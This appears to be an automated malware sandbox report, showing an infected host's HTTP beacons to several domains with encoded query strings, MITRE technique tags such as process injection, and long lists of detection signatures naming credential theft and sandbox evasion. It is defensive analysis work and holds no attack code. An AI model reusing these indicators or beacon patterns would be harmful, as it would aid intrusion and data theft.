Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-30 13:57:09.273 192.168.1.3 [VT] 49195 199.192.30.223 [VT] 80 None www.magentos.info [VT] /b6fg/ None Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko http://www.magentos.info/b6fg/ 0
2020-06-30 13:57:14.787 192.168.1.3 [VT] 49196 199.192.30.223 [VT] 80 None www.magentos.info [VT] /b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP None None None 0
2020-06-30 13:57:21.398 192.168.1.3 [VT] 49197 34.102.136.180 [VT] 80 None www.callisterlawgroup.com [VT] /b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H None None None 0
2020-06-30 13:57:33.177 192.168.1.3 [VT] 49198 50.63.202.41 [VT] 80 None www.xinhby.com [VT] /b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0 None None None 0
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.3 49180 13.107.42.23 443 3b483d0b34894548b602e8d18cdc24c5 unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1045 - Software Packing
    • Signature - packer_entropy
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 25.571999999999996 seconds )

    • 15.992 NetworkAnalysis
    • 5.342 Suricata
    • 3.093 BehaviorAnalysis
    • 0.421 Static
    • 0.227 CAPE
    • 0.191 VirusTotal
    • 0.151 static_dotnet
    • 0.065 Deduplicate
    • 0.03 AnalysisInfo
    • 0.028 TargetInfo
    • 0.017 Debug
    • 0.008 Strings
    • 0.006 peid
    • 0.001 ProcDump

    Signatures ( 0.38300000000000023 seconds )

    • 0.066 antiav_detectreg
    • 0.027 infostealer_ftp
    • 0.023 territorial_disputes_sigs
    • 0.017 masquerade_process_name
    • 0.015 antiav_detectfile
    • 0.015 infostealer_im
    • 0.014 antianalysis_detectreg
    • 0.009 infostealer_bitcoin
    • 0.009 ransomware_files
    • 0.008 stealth_timeout
    • 0.008 antianalysis_detectfile
    • 0.007 api_spamming
    • 0.007 decoy_document
    • 0.007 antivm_vbox_keys
    • 0.007 infostealer_mail
    • 0.006 antivm_vbox_files
    • 0.006 ransomware_extensions
    • 0.005 NewtWire Behavior
    • 0.005 antivm_vmware_keys
    • 0.005 network_cnc_http
    • 0.004 Doppelganging
    • 0.004 Unpacker
    • 0.004 qulab_files
    • 0.004 network_torgateway
    • 0.003 InjectionCreateRemoteThread
    • 0.003 injection_createremotethread
    • 0.003 persistence_autorun
    • 0.003 antivm_parallels_keys
    • 0.003 antivm_xen_keys
    • 0.003 geodo_banking_trojan
    • 0.003 predatorthethief_files
    • 0.003 recon_checkip
    • 0.002 InjectionProcessHollowing
    • 0.002 antidebug_guardpages
    • 0.002 antiemu_wine_func
    • 0.002 antivm_generic_disk
    • 0.002 betabot_behavior
    • 0.002 guloader_apis
    • 0.002 dynamic_function_loading
    • 0.002 exec_crash
    • 0.002 exploit_heapspray
    • 0.002 injection_runpe
    • 0.002 kibex_behavior
    • 0.002 malicious_dynamic_function_loading
    • 0.002 mimics_filetime
    • 0.002 antidbg_devices
    • 0.002 antivm_generic_diskreg
    • 0.002 antivm_vmware_files
    • 0.002 antivm_vpc_keys
    • 0.002 masslogger_files
    • 0.002 network_dns_opennic
    • 0.001 InjectionInterProcess
    • 0.001 antiav_avast_libs
    • 0.001 antidbg_windows
    • 0.001 antivm_generic_scsi
    • 0.001 antivm_generic_services
    • 0.001 antivm_vbox_libs
    • 0.001 bootkit
    • 0.001 exploit_getbasekerneladdress
    • 0.001 hancitor_behavior
    • 0.001 hawkeye_behavior
    • 0.001 infostealer_browser
    • 0.001 infostealer_browser_password
    • 0.001 kazybot_behavior
    • 0.001 kovter_behavior
    • 0.001 network_tor
    • 0.001 reads_self
    • 0.001 shifu_behavior
    • 0.001 stack_pivot
    • 0.001 stealth_file
    • 0.001 tinba_behavior
    • 0.001 vawtrak_behavior
    • 0.001 virus
    • 0.001 antivm_xen_keys
    • 0.001 antivm_hyperv_keys
    • 0.001 antivm_vbox_devices
    • 0.001 ketrican_regkeys
    • 0.001 browser_security
    • 0.001 bypass_firewall
    • 0.001 codelux_behavior
    • 0.001 darkcomet_regkeys
    • 0.001 disables_browser_warn
    • 0.001 azorult_mutexes
    • 0.001 network_dns_blockchain
    • 0.001 network_dns_doh_tls
    • 0.001 network_http
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 rat_pcclient
    • 0.001 recon_fingerprint

    Reporting ( 8.430999999999997 seconds )

    • 7.112 BinGraph
    • 1.193 JsonDump
    • 0.072 SubmitCAPE
    • 0.046 MITRE_TTPS
    • 0.008 PCAP2CERT